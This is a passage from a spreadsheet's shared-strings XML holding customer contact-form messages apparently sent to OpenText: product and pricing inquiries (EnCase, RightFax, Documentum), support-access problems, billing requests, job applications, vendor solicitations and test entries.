- personal accident (for travel, group, school students)_x000D_
- commercial (marine, bonds, casualty, engineering)_x000D_
_x000D_
The reason I’m reaching out to you is because I’d like to ask if there’s a possibility that we can arrange a collaboration with you where we provide a Financial Needs Analysis program for your employees maybe as part of your employee engagement activities. Ideal setup would be a small group at a time, not exceeding 5 persons (negotiable) or even 1-on-1 is good so we can cater specifically to the financial needs of each individual._x000D_
_x000D_
In this way we can implement the program quickly without much hassle. We can conduct a session in a small enclosed office space, open lobby at the reception, pantry, or a nearby cafeteria._x000D_
_x000D_
The aim of the free Financial Needs Analysis program for your employees is to determine and uncover their financial priorities with your (company’s) help and initiative and for us to provide a solution on how to plan or prepare for expected needs (such as education for their kids or for future retirement) and unexpected needs (such as death or sickness of the breadwinner or employee). _x000D_
_x000D_
Please note that one session will not exceed an hour and there will be no commitment to get an insurance at all. After the discussion, we’ll just provide a recommendation on how to solve their f</t>
  </si>
  <si>
    <t>would like to try a trial licence of Encase. looking to try new software for my Forensic Examinations.  currently using FTK and X-Ways Forensics.</t>
  </si>
  <si>
    <t>Brookshire Grocery Company is looking into possible upgrading its Corporate Fax Solution in the near future.  Is their an email address I can send an RFI to?  _x000D_
You can reach me at robertgray@brookshires.com_x000D_
_x000D_
Thanks,_x000D_
Robert Gray</t>
  </si>
  <si>
    <t>I am trying to register for OnDemand Building an Investigation course.  I am getting a "web error" message.  Please let me know if my registration went through or not...</t>
  </si>
  <si>
    <t>You own me money</t>
  </si>
  <si>
    <t>I would like to receive a quote for OpenText exceed. I left a voice message last Friday and have not received a call back. Thank you in advance.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello to all,_x000D_
_x000D_
Can you please forward a current statement for the following accounts (50890 &amp; 757781) in order to assist with account reconciliation?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Wanda R. Boyd_x000D_
Finance Operations Analyst_x000D_
Anda Inc_x000D_
(P) 954-217-4455_x000D_
(E) wanda.boyd@andanet.com_x000D_
_x000D_
Thanks,_x000D_
</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
One of our clients is interested in Opentext's DAM solution and will be running an RFP. We were wondering whether it would be possible for us to set up a call to discuss further, since we would be interested in holding a demo of the solution to understand whether it would meet the client's requirements?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Sofia Dominguez</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I'm in need of documentation about the system requirements for xPresso and xPression 4.6)_x000D_
SO, RAM, Office, ect_x000D_
Thanks a lot._x000D_
_x000D_
Francesco Rinaldi_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Please can you amend the company address, Tel. &amp; Fax numbers for MOL Tankship Management Ltd  to:_x000D_
_x000D_
3 Thomas More Square_x000D_
St Katharine’s &amp; Wapping_x000D_
London_x000D_
E1W 1YZ_x000D_
Tel: 44 (0)20 7764 8000_x000D_
Fax: 44 (0)20 3764 8393 </t>
  </si>
  <si>
    <t>I have a Hightail account.  I've been logging on there instead of Open Text because it's easy for me, nothing new to learn.  Now it's not working.  I can put the email address on, add the files and it just sits there.  Doesn't upload, doesn't give me the "send" message.  Nothing.  I need to get my work out.  Can you please fix the problem???</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to speak with a customer service rep. Please call me as soon as possible. </t>
  </si>
  <si>
    <t xml:space="preserve">Naviant is assisting the Minnesota VA in an upgrade of Teleform form version 10 to version 16.3 - need license activation code and other possible support </t>
  </si>
  <si>
    <t>Bonjour, sur un projet actuellement à l'étude, je cherche une solution qui serait capable de parser et d'éclater un flux AFP sur la base d'informations contenues dans le NOP du flux._x000D_
Est-ce que vous pouvez me faire parvenir une brochure par retour de mail s'il vous plait ?_x000D_
Dans l'attente de votre réponse, vous remerciant par avance, _x000D_
Bien cordialement,_x000D_
Mathias P.</t>
  </si>
  <si>
    <t>We are interested in learning more about Rightfax healthcare direct solution. We are an EMR company and want to see if this would integrate well with our system. I would like to set up some time to discuss your solution in detail.</t>
  </si>
  <si>
    <t>See we no longer use Xpedite... I need to get a W-9 form in order to setup Opentext as a vendor.  Please email the W-9 form</t>
  </si>
  <si>
    <t xml:space="preserve">Want money </t>
  </si>
  <si>
    <t>We are interested in discussing our Document Capture and Document Transformation requirements.  We currently process over 32 million documents per annum using a system that has been in place for more than 10 years:  we need to understand what OpenText can offer to us in this category.</t>
  </si>
  <si>
    <t>We are looking to get a quote for Encase and need it by the C.O.B today for budgeting purposes.</t>
  </si>
  <si>
    <t xml:space="preserve">Business </t>
  </si>
  <si>
    <t xml:space="preserve">I keep getting the following error "We're sorry, your account does not grant you access to this resource." when accessing My support.  I get the confirmation email and confirmed it, but I still get the error above when going to My Support. </t>
  </si>
  <si>
    <t>I am trying to register for DF320 - Advanced Analysis of Windows Artifacts with EnCase® OnDemand, however whenever I submit the form I receive a Web Server Error.  Can you please register me for this course?  I have a training passport, number 146244.</t>
  </si>
  <si>
    <t>Due to new policies I need verification of bank details before I can pay the latest invoice received by us from yourselves and there is no contact information on the invoice.</t>
  </si>
  <si>
    <t>Purchased Brava Desktop CXL 16.3 in Feb. 2018.  We have been having problems with our computer and had to have it worked on.  We were told that any programs we had downloaded would need to be downloaded again.  How do I go about reinstalling?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hi! Good day,We are highly interested in quoting the following parts:_x000D_
_x000D_
NSN:1560219132846_x000D_
Quantity: 1  EA_x000D_
Description:DEFLECTOR,CABLE_x000D_
Part Number:NS203182NL6-3_x000D_
Manufacturer name : MAGELLAN AEROSPACE WINNIPEG_x000D_
_x000D_
Please let us know:_x000D_
_x000D_
Price: ________________x000D_
Stock/Lead time:_______________x000D_
Minimum Purchase Order / Minimum Order Quantity:__________x000D_
Is this part obsolete? (YES/NO)________x000D_
_x000D_
_x000D_
*If the part was replaced, the replacement is the exact fit, form and functionality as the requested one?_x000D_
* Please let us know any additional information _x000D_
_x000D_
Thanks so much and we look forward to receiving your response._x000D_
_x000D_
Best regards_x000D_
</t>
  </si>
  <si>
    <t>Ramsay UK is looking for a document management system to support its current electronic patient record and to manage its corporate documentation.</t>
  </si>
  <si>
    <t>Looking for information regarding licensing for GUPTA Teamdeveloper 3.1</t>
  </si>
  <si>
    <t>We currently have the basic academic support, but would like to know the options and costs for a more responsive support. I.E 4 hours response etc</t>
  </si>
  <si>
    <t>We would like to quit our contract. How long is the notice period?_x000D_
Our contract ends 2019/03/31. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
 _x000D_
I hope this email finds you well. I am a researcher at Chambers &amp; Partners, an independent publisher of legal guides. Chambers &amp; Partners has decided to publish a LawTech Report for the year 2019 to shine a spotlight on established and upcoming companies in the field of LawTech. As part of this research we would like to interview an appropriate person at Opentext for the report._x000D_
_x000D_
We would like to have a phone conversation about the company, its work in the field, and general trends in the wider market. Chambers &amp; Partners prides itself on its independence and confidentiality, and any sensitive information that may be disclosed during the interview shall remain confidential. _x000D_
_x000D_
Please feel free to call my number as listed below or send me an email so we can set up a time and a date for an interview._x000D_
_x000D_
 I look forward to hearing from you._x000D_
_x000D_
Kind regards,_x000D_
Cyrus Motashaw_x000D_
</t>
  </si>
  <si>
    <t>Can you please direct me to the right link or help with access to Product forum.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Pourriez-vous m'informer si le sujet Centura team Developper sera abordé lors de la conférence Enterprise World à Vienne en 2019 ?_x000D_
Merci !</t>
  </si>
  <si>
    <t>Seeking Documentum training in the UK.</t>
  </si>
  <si>
    <t>Following on my request on the 21 November 2018 10:18 to : 'datamanagement.eu@opentext.com_x000D_
I urgently need a reply back._x000D_
Hi Team,_x000D_
_x000D_
Further to a review of UK technology contracts for MUFG’s Brexit preparedness the Master Customer Agreement (MCA), Terms of Service (TOS) and Service Schedule (Service Schedule)  dated 15th October 2010 for EasyLink’s Production Messaging Services have come back from the Legal department._x000D_
This service which is for the Opentext software automation system is expected to be used by the new Dutch entity MUFG Securities (Europe) N.V., a wholly owned subsidiary of Mitsubishi UFG Securities (EMEA) plc which is currently the sole user of the service as Customer and signatory to the MCA and Service Schedule._x000D_
Legal has requested that the following amendment be made to the TOC in order for the contract documentation to expressly permit the service to be used by the new entity:   _x000D_
•	Paragraph 1(a) of the TOS entitled “Agreement” defines the Customer of the service to include “(its parent company, subsidiaries and affiliates) specifically identified in another document that incorporate these TOS by reference”.   Legal has requested that an amendment or other schedule be prepared establishing MUFG Securities (Europe) N.V. as a named entity within the definition of Customer._x000D_
Please confirm that the above amendment is acceptable and provide the documentation, which we can get signed by either Mitsubishi UFG Securities (EMEA) plc or MUFG Securities (Europe) N.V. or both, as appropriate.</t>
  </si>
  <si>
    <t>Where do I download Exceed 15 Service Pack 5?</t>
  </si>
  <si>
    <t>asdasd</t>
  </si>
  <si>
    <t>I'm Hana from Hays. I'm providing IT contractors in all specialisms in Kanto area._x000D_
If you need any IT staff, please let me know. I can send you some potential resumes._x000D_
_x000D_
I'm looking forward to meeting you to present more about my proposal._x000D_
Sincerely,_x000D_
Hana.</t>
  </si>
  <si>
    <t>Dear Colleagues!_x000D_
_x000D_
As part of an Partner Program (Partner ID - 912640) with SAP, we want to deploy a set of SAP sandboxing products. To do this, we need to install Open text. Tell me, please, what is needed for this? Do I need to purchase separate licenses? If so, what specific licenses (name, price)? Where can I download the application for installation in my Open text?</t>
  </si>
  <si>
    <t>ticket 1-3486189211 (I have not heard anything form our urgent problem)</t>
  </si>
  <si>
    <t>we are interested in using a enterprise information management  system in our  Company. So kindly reply back with your solutions to EIM tool.</t>
  </si>
  <si>
    <t>hjkgjkl</t>
  </si>
  <si>
    <t>asdasfsg</t>
  </si>
  <si>
    <t>37-07 147TH ST FLUSHING</t>
  </si>
  <si>
    <t>Question about Gupta Release 6.2 in collaboration with Windows 10</t>
  </si>
  <si>
    <t>rtyrty</t>
  </si>
  <si>
    <t>Hello,_x000D_
 _x000D_
How are you? Hope you are fine._x000D_
 _x000D_
I have been checking your website quite often. It has seen that the main keywords are still not in top 10 rank. You know things of working;  I mean the procedure of working has changed a lot._x000D_
 _x000D_
So I would like to have opportunity to work for you and this time we will bring the keywords to the top 10 spot with guaranteed period._x000D_
 _x000D_
There is no wondering that it is possible now cause, I have found out that there are few things need to be done for better performances (Some we Discuss, in this email). Let me tell you some of them -_x000D_
 _x000D_
1. Title Tag Optimization_x000D_
2. Meta Tag Optimization (Description, keyword and etc)_x000D_
3. Heading Tags Optimization_x000D_
4. Targeted keywords are not placed into tags_x000D_
5. Alt / Image tags Optimization_x000D_
6. Google Publisher is missing_x000D_
7. Custom 404 Page is missing_x000D_
8. The Products are not following Structured markup data_x000D_
9. Website Speed Development (Both Mobile and Desktop)_x000D_
Please check via Google Developer -_x000D_
10. Favicon needs to be changed too._x000D_
11. Off –Page SEO work_x000D_
 _x000D_
Lots are pending…………….._x000D_
 _x000D_
You can see these are the things that need to be done properly to make the keywords others to get into the top 10 spot in Google Search &amp; your sales Increase._x000D_
 _x000D_
Also there is one more thing to mention that you did thousands of links that time for your website, which are considered as spam after Google roll outs several updates of Panda and penguin. We need to remove them too._x000D_
 _x000D_
Sir/Madam, please give us a chance to fix these errors and we will give you rank on these keywords._x000D_
 _x000D_
Please let me know if you encounter any problems or if there is anything you need. If this email has reached you by mistake or if you do not wish to take advantage of this  advertising opportunity, please accept my apology for any inconvenience caused and rest assured that you will not be contacted again._x000D_
 _x000D_
Many thanks for your time and consideration,_x000D_
 _x000D_
Looking forward_x000D_
 _x000D_
Regards_x000D_
_x000D_
Oscar Albert_x000D_
_x000D_
If you did not</t>
  </si>
  <si>
    <t>fdhgfghg</t>
  </si>
  <si>
    <t>trju</t>
  </si>
  <si>
    <t xml:space="preserve">sfegedrfgd_x000D_
</t>
  </si>
  <si>
    <t>Requirement for a government project.</t>
  </si>
  <si>
    <t>SKHDAIUF</t>
  </si>
  <si>
    <t>DDGBDER</t>
  </si>
  <si>
    <t xml:space="preserve">Hi - Looking for some pricing for your FAX solution gateway to integrate with Cisco Unified Communications Manager and Unity Connections V12 please - i'm also looking for hardware required to install your software - Rgds &amp; Thx_x000D_
</t>
  </si>
  <si>
    <t>Hi, I am looking for document management solutions and found you product OpenText (ECM) but there is no information regarding pricing/Licensing. Could you send me some information on the licensing/Pricing?</t>
  </si>
  <si>
    <t>In the past during Sep. 2013, I did a VIM Training and Certification. I would like to know the possibility of getting the Certificate of the same. Can you please let me know whom do I need to contact?? Thank you</t>
  </si>
  <si>
    <t>Need latest patch for your product  EnCase Basic SAFE  with its release dates</t>
  </si>
  <si>
    <t>I am individual consultant and I am looking for Remote job. I have expertise in Liferay/java with 4.5+ years  of experience._x000D_
This is regarding job posting advertise on LinkedIn for Liferay developer. _x000D_
Do let me know if there is any remote position which can help both of us for betterment.</t>
  </si>
  <si>
    <t>We are looking for a suitable EIM platform for our organization that is currently 400+ and growing. Would like to know the services provided by Open text and the relevance of the same with our requirements.</t>
  </si>
  <si>
    <t xml:space="preserve">Open new centre </t>
  </si>
  <si>
    <t>Want to start Fresh Ceragem again with NEW Managment</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
We are on the look of setting up a lab which should have the listed features. _x000D_
Application which can be operated on a platform and device irrespective of the make of OS and Hardware. _x000D_
                _x000D_
a.	Email Forensic –  to study the source and content of electronic mail as evidence, this includes archives on server and local hard disk (‘.nsf’ &amp; “.pst” files)_x000D_
b.	Hard Disk Forensic – _x000D_
a.	Imaging – Solution should be able to create an image of the hard disk while in it should not write / change any information on the device under investigation. (Should have capability of remote imaging and should also be portable)_x000D_
b.	Indexing : Solution should be able to create index for search mechanism to review the data for analysis. _x000D_
c.	Reviewing : Solution should be able to review the indexed data. _x000D_
d.	Recovery of deleted files / logs : Solution should be capable to recover the selected logs / files from mirror / imaged data or target systems. _x000D_
e.	Carving : Solution should be capable of performing mobile devices. _x000D_
f.	Mobile Forensic : Solution should be capable of performing mobile devices. _x000D_
c.	Decryption –  Should be able to decrypt the encrypted / password protected file. _x000D_
d.	Remote Access – Should be able to collect data over the network. _x000D_
e.	Web Forensic -  To gather critical information as part of an investigation by exploring the browsing history of a person, the number of times a website has been visited, the duration of each visit, the files that have been uploaded and downloaded form the visited website, the cookies setup as part of the visit and other critical information. _x000D_
_x000D_
Wondering whether Encase has got the above listed features and if so would like to get a quote for the same. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, this is regarding EnCE certification, application submitted and I'm awaiting for payment details from the team, however team has responded saying "training is no longer in charge of payments or invoicing them". Kindly advise a way forward as I am keen on taking the test. Looking forward to hearing back from you. _x000D_
_x000D_
Regards, _x000D_
Prachee  </t>
  </si>
  <si>
    <t>Job opportunity</t>
  </si>
  <si>
    <t xml:space="preserve">SAD ASD S </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
i was trying to register to the virtual class on the 18 Dec for the course #310 but i was getting "web server error". I already have passport number to register with which is: 143419_x000D_
can you register me on the course ? or at least let me know if the error is no longer appears so that I can register ASAP. _x000D_
Thank you .. </t>
  </si>
  <si>
    <t>dfhtf</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Hope this email finds you well!_x000D_
_x000D_
Would you be interested in Legaltech 2019 Attendees List?_x000D_
_x000D_
Here is the chance to acquire the list for best pricing due to YearEnd Sale._x000D_
_x000D_
List contains - Contact Name, Job Title, Company/Business Name, Complete Mailing Details, email, Tel/Fax Number, Website/URL etc._x000D_
_x000D_
If you are interested, please let me know your thoughts, so that I can send you the no of contacts available and the pricing for it._x000D_
_x000D_
I’m assuming you’re the best person for this – If not, who would you recommend I speak with?_x000D_
_x000D_
I look forward to hearing from you._x000D_
</t>
  </si>
  <si>
    <t>df h dhdf hdf</t>
  </si>
  <si>
    <t>saf4ewtg</t>
  </si>
  <si>
    <t>catalog mail to residence</t>
  </si>
  <si>
    <t>We would be glad to offer Eye Care services for your Employees.Conviniently located in STONE ROAD MALL in Guelph with expereinced optometrist.And longer operational hours _x000D_
_x000D_
Please let us know the process to have your employees referred to EYE CANDY EYEWEAR</t>
  </si>
  <si>
    <t>Aspieing</t>
  </si>
  <si>
    <t xml:space="preserve">Hi may dear, may name Ali mohomed i studied public administactiom at University of somali, and Ihas worked 9 company in country just ineed to get extr experience please respons </t>
  </si>
  <si>
    <t>I’m currently proficient in M-files but would like to learn opentext or have and environment where I can teach myself and apply for positions. Would it be possible to point me in the right direction. I have 5 years of ECM administration and 1 year consulting and many of the positions I find in the ECM market in Houston are for Opentext.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
My organisation is looking into a digital asset management tool.  We have a range of digital assets (images, videos) from marketing as well as from other org units such as the library, museum and archives._x000D_
I would like to get the following information:_x000D_
1. Price? What is your pricing model? What variables determine the price? What are included? Training? Support?_x000D_
2. Does OpenText do implementation as well? Or do you have implementation partners?_x000D_
3. What are the process/steps in the implementation? What is the duration of these steps in a typical implementation?_x000D_
4. What roles are involved in the implementation?_x000D_
	5. Do you have integration with other tools such as Collaboration/Planning Tool? Adobe Creative?_x000D_
	6. Has the tool been implemented in the tertiary education sector?_x000D_
_x000D_
If I can please get a reply as soon as possible to these queries it would be great._x000D_
_x000D_
Thank you._x000D_
_x000D_
Mailes_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Employment </t>
  </si>
  <si>
    <t xml:space="preserve">dear sir_x000D_
GIC is an IT products supplier in the state of Kuwait _x000D_
our clinet National COuncil for Culture, Arts and Letters(Government) is tendering to purchase_x000D_
qty 5   Brava Desktop software_x000D_
_x000D_
please quote us reseller price if possible </t>
  </si>
  <si>
    <t>One of my client is looking for Encase renewal license, need your support in terms of pricing.</t>
  </si>
  <si>
    <t>dgyweiyuftegf</t>
  </si>
  <si>
    <t>We recently had our lab set up. And we were promised training of the tools in the lab, one of the tools include Encase Forensics. The reference is 122216. We would like to start our training as soon as possible.</t>
  </si>
  <si>
    <t>Interested in learning more about the OpenText Capture Recognition Engine.</t>
  </si>
  <si>
    <t>Hello, I'm contacting you on behalf of our mutual client, Toyota.  Can you please advise if you accept American Express as a form of payment?  Toyota will begin using Amex as of 2019.  Thank you!</t>
  </si>
  <si>
    <t>Would you please send me a quote for Two (2) Teleform Licenses and maintenance agreetments for Teleform CEM Desktop Suite?    Thank you - Jane Hurley</t>
  </si>
  <si>
    <t xml:space="preserve">ticket 1-3487827348 _x000D_
_x000D_
I need help to cancel my account here is my ticket number </t>
  </si>
  <si>
    <t>We extended our licence for EnCase Forensic software. I'm not able to download new 8.08 version. When ever I try to access some page on support portal it requires to register account and it shows No access.</t>
  </si>
  <si>
    <t>Looking to migrate to cloud hosted service from on prem Rightfax server</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
can you please provide a quote for Hummingbird Exceed for quantity 1?_x000D_
_x000D_
Thanks,</t>
  </si>
  <si>
    <t>I was hoping to get a quote on purchasing the Alchemy 9.0 Web server.  (We don't need any more client licenses).  It will be used for NYS DOCCS's Corcraft division (you should have their license info on file)._x000D_
_x000D_
Our SUID is 65685-12120_x000D_
contract number is 0012090702 _x000D_
_x000D_
(I believe I'm having an issue calling your office due to it being in Canada)_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Teck Resources Limited (“Teck”) is a diversified resource company committed to responsible mining and mineral development with major business units focused on copper, metallurgical coal, zinc and energy. The objective of this project is to select and implement a product that will replace the current Document Management System that is being used by the Project Development Group (PDG) at Teck’. I am interested in retrieving a contact with opentext to answer some questions regarding potential solutions to our requirements. </t>
  </si>
  <si>
    <t>We are considering acquiring the source for an older product written using the Centura  Team Developer product and we are wondering whether older versions of the CTD product  could be purchased to make this possible._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Jeff Jordan_x000D_
Arbella Insurance Group_x000D_
Jeffrey.jordan@arbella.com</t>
  </si>
  <si>
    <t>We have 2 FaxPress servers, 1 is a slave unit to the other. The slave unit has 8 lines, all of which are showing as "disconnect" in the FP application. We have rebooted the server twice. This is an urgent issue as these lines are used by our triage nurses and will be needed all weekend. Please advise.</t>
  </si>
  <si>
    <t>_x000D_
I do not have access to the support to download EnCase 8.08._x000D_
He redirects me to Guidance Software and I do not have access through the Customer portal._x000D_
I request activation access page of Opentex support._x000D_
Thank you</t>
  </si>
  <si>
    <t>Currently using another faxing solution but looking at options.</t>
  </si>
  <si>
    <t>I have downloaded the Free DWG Viewer but I am stuck in a loop where it tells me I have an invalid license and to go to Update. It brings me to the Brava site but nothing happens. I try again and same thing happens. What do I need to do to get an update to the viewer? Thanks.</t>
  </si>
  <si>
    <t>Inquire about license costs for teleform software</t>
  </si>
  <si>
    <t>Ram Nandan Panditmanoj8105@gmail</t>
  </si>
  <si>
    <t>Need contact for sales in Latin America</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We are looking for a course on GCdocs Physical Object set-up and functionality in Ottawa. Could you please provide some information?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Isabelle  </t>
  </si>
  <si>
    <t>Please grant me access to the My Support site for accessing product support for Documentum products.</t>
  </si>
  <si>
    <t xml:space="preserve">Would you please forward this inquire to your HR department? _x000D_
There is a job positing of Senior Corporate Events Planner (Ref#: 21493) that I saw on Indeed and applied on the website. Indeed listed the position is located at Richmond Hill, but the website listed it as Waterloo. May I check with you regarding the location of this position as well as my application process? I submitted my application on Nov 18, 2018. Thank you very much. </t>
  </si>
  <si>
    <t>I'm interested in your product and would like to schedule a phone call/sales demo.  Thank you!</t>
  </si>
  <si>
    <t>Is Content Server phasing out projects and binder containers?</t>
  </si>
  <si>
    <t>We would like a demo of your Enterprise Information Management product.</t>
  </si>
  <si>
    <t>Hallo_x000D_
Ich suche für den Centura Report Builder ein Handbuch. wenn möglich auf Deutsch. Haben sie sowas?</t>
  </si>
  <si>
    <t>Dear Sir or Madam_x000D_
_x000D_
We need to convert a customers database from sqlbase to another db-type. We have received the trial version of SQLBase 12.1. Could you inform us what the limitations of the trial version are and what prices would look like if we needed the full version (temporary use, single user licence)?_x000D_
_x000D_
Kind regards_x000D_
_x000D_
Steven Utiger</t>
  </si>
  <si>
    <t>We have been sent  invoice 9000749203 which we are unable to process due to the change in company details, name, bank account and VAT.  Please can someone contact myself to resolve.</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
Can you tell me how to uninstall opentext desktop viewer_x000D_
_x000D_
Thank you _x000D_
Justin</t>
  </si>
  <si>
    <t>Cost of Accelerate for a small business? Is it off the shelf or does it require complex IT implementation?  Can it work on a bundle/folder of docs or does i need to index servers etc</t>
  </si>
  <si>
    <t>I have KC SUPPORT account from  my email account which is not working when i am resettting password link is not recieveing to my email</t>
  </si>
  <si>
    <t>I looked Tempo Box File Sync Desktop application, so there have some video Demo. but I cant find the download link for it. please give me instruction for download that.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
How are you doing? _x000D_
_x000D_
Are you looking for the combined set of web services? _x000D_
_x000D_
I can help you get the best in industry web design and mobile app services. _x000D_
_x000D_
Also, get some amazing SEO services for website ranking._x000D_
_x000D_
Thanks_x000D_
Betty | Whatsapp: +91 9212464161_x000D_
</t>
  </si>
  <si>
    <t>Cnt#0012257663 - need to place an order for this</t>
  </si>
  <si>
    <t>Requesting Bill review access on portal and copy of CSR detailing service address, telephone numbers and circuit IDs</t>
  </si>
  <si>
    <t>Hi, Please let me know how to contact the Recruiter. I would like to talk on my interest to work with Opentext. I had applied for Project Manager role still active in the company's career site. Since I see this role is posted in July 2018, I am not sure if it is still open. But, it would be nice to get the contact of Recruiter. Please let me know. Thank you._x000D_
Best Regards,_x000D_
Sinthiya Ramamoorthy</t>
  </si>
  <si>
    <t>Looking for pricing for document management software like Documentum for 500 users and 5,000 drawings.</t>
  </si>
  <si>
    <t>Interested in your Media Management or Bin products, looking for a demo.  Please call.</t>
  </si>
  <si>
    <t>Just a test</t>
  </si>
  <si>
    <t>Early bird registration fee for OpenText conference in Toronto 2019.</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
_x000D_
IRS requires that we obtain and maintain Form W-9 for all of our vendors. In order to ensure our reporting accuracy please reply to this email with a copy of your company’s W-9 form._x000D_
_x000D_
Thank you._x000D_
_x000D_
Lorene Monangai_x000D_
Junior Accountant_x000D_
Office 703.495. 2900. Ext 117_x000D_
AOC Solutions | Leadership with Experience_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>If possible, can you send me a purchase order for DF120 and DF210 classes for the Virtual Classroom - North America GSI Eastern Time?</t>
  </si>
  <si>
    <t>just a test</t>
  </si>
  <si>
    <t>Just a test - training</t>
  </si>
  <si>
    <t>To learn and have more knowledge and get those promised megabytes</t>
  </si>
  <si>
    <t>Looking to purchase a single license of Open Text BI Query Admin.  Need a quote please.</t>
  </si>
  <si>
    <t xml:space="preserve">copy of receipt, I purchased an invoice a few days ago and haven't received the receipt.  Could you send it to me?  Billing Doc. #: 9000797620, Invoice Date : 2018-10-10 Due Date: 2018-11-09 Renewal Number: RC336569 GST#: 80361 5467 RT00 EIN# 46-0525483 </t>
  </si>
  <si>
    <t>Unable to login on My Support page.  Keeps telling me to sign in again and verify who I am.   I need to download the license file as we just renewed them.   Thank you</t>
  </si>
  <si>
    <t>Licensing cost for Archive Server 10.5</t>
  </si>
  <si>
    <t>Would like to purchase RightFax</t>
  </si>
  <si>
    <t>I'm trying to enable access to raise SRs under The Hartford Insurance Group account and download the patches. But, I'm not able to get the access enabled. I tried it multiple times, and received activation mails. However, the access never got enabled. Please help with this.</t>
  </si>
  <si>
    <t>We use InterWoven (Content Management System), and right now we are having issues with the tool. We would really appreciate if we can get any support from your Team. If support from  OpenText would cost us, please let us know the pricing details as well._x000D_
_x000D_
Thank you..!</t>
  </si>
  <si>
    <t xml:space="preserve">This is a test of the new contact us form - please confirm receipt to marketingops@opentext.com </t>
  </si>
  <si>
    <t>Looking for a general idea of how much CPU/disk/memory resources is used on each machine that has a servlet running on it.</t>
  </si>
  <si>
    <t xml:space="preserve">Please associate my email address (Schar.Cullen@bls.gov) with contract #12253591 so that I can access "My Support"._x000D_
_x000D_
Thanks,_x000D_
Cullen Schar </t>
  </si>
  <si>
    <t>Need to review options for transitioning from one Partner to another or buying direct from OpenText.  Our needs have changed and the existing partner is not meeting them.</t>
  </si>
  <si>
    <t>Currently working with V8-4-61-PS-20160729.2  Please provide information on the current version and hardware requirements or any patches or updates required for our current version</t>
  </si>
  <si>
    <t>Unable to reset my password when I use you link from the email "password recovery"_x000D_
I get always the same message "update password failed"_x000D_
I not able to sign in the support web page !</t>
  </si>
  <si>
    <t>How can i get in contact with a sale person for a demo</t>
  </si>
  <si>
    <t>New Contractor for NLRB</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
We have acquired the data from a MacBook Air running APFS with FileVault2 encryption.  The data was acquired using the latsest revision of Macquisition._x000D_
When we use EnCase 8.08 to analyse the data we get a basic folder structure and with no viewable files or folders._x000D_
Is there any update as to when full support for APFS is available through your software?  Do you fully support unencrypted Mac devices._x000D_
I look forward to hearing from you._x000D_
Matt_x000D_
</t>
  </si>
  <si>
    <t>How can I check how many elite points my company has?</t>
  </si>
  <si>
    <t>Nvagashy</t>
  </si>
  <si>
    <t>Jared Danberts account will not work??  It says its active but he is not getting any faxes??  I tried to delete the account and set up a new one, but that didnt work either.  Any help would be great.   Thanks</t>
  </si>
  <si>
    <t>We currently use an old 32 bit version of Open Text Livelink ECM - Business Intelligence. I would like to speak with someone about a license for your 64 bit Enterprise version. _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Chris Kuykendall</t>
  </si>
  <si>
    <t xml:space="preserve">plzzzz call me I need a job plzzzz </t>
  </si>
  <si>
    <t xml:space="preserve">I am leaving my current employer and I have a Fax2mail account. I would like to port that fax number over to an account I own for my new company. </t>
  </si>
  <si>
    <t>Require CMS.</t>
  </si>
  <si>
    <t>I am not able to connect to MySupport and not able to see any specific Documentum D2, infoArchive whitepapers,best practises, tickets etc.</t>
  </si>
  <si>
    <t xml:space="preserve">Require update for ICR license request. SystemID 5349 Serial 10-10342945. Please treat this as urgent as customer has been down for a week now. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I am interested to learn more about your solution in terms of digital archiving of accounting backups and contracts to move away from printing hard copies in the future. I would like to know if you also offer integrations with accounting systems and have experience in compliance with the relevant Swiss law. </t>
  </si>
  <si>
    <t>I am trying to contact a Dr. Marcus Zelezny who I believe works with you.  The "Dr. M. Zelezny" I am tyying to contact had visited Egypt's Western Desert about 20 years ago.  Thank you for your attention to this.  (Dr.) John M. Saul</t>
  </si>
  <si>
    <t>I'm a hard working person</t>
  </si>
  <si>
    <t>I want to get certify. Kindly share the location and authority detail in India</t>
  </si>
  <si>
    <t>As an Opentext partner (fme AG) I want to register a lead at the deal desk. Unfortunately I get an Access Denied Message. Could you please check my permissions and status? _x000D_
_x000D_
Thanks and best regards!_x000D_
Katja Seidel</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am trying to log in the website. I entered my login and password. Then I got on the screen tour website with big title Server Error. I have tried to log in using computer and mobile phone. The same problem occurs. Could you help me with that ? Maybe you should restart of my acount...</t>
  </si>
  <si>
    <t xml:space="preserve">We are not able access Opentext support site for below id's:_x000D_
Sonika.bisht@accenture.com_x000D_
punith.kumar.hb@accenture.com_x000D_
punith.kumar@uk.rsagroup.com_x000D_
Could you please grant access same like mark.goodson@uk.rsagroup.com_x000D_
_x000D_
Regards,_x000D_
Sonika Bisht_x000D_
Accenture_x000D_
</t>
  </si>
  <si>
    <t>We are in process to create a big e commerce system and for that we are looking for a powerful CMS to handle all UI and flow changes on the go.</t>
  </si>
  <si>
    <t>We would like to evaluate your ECM Product: _x000D_
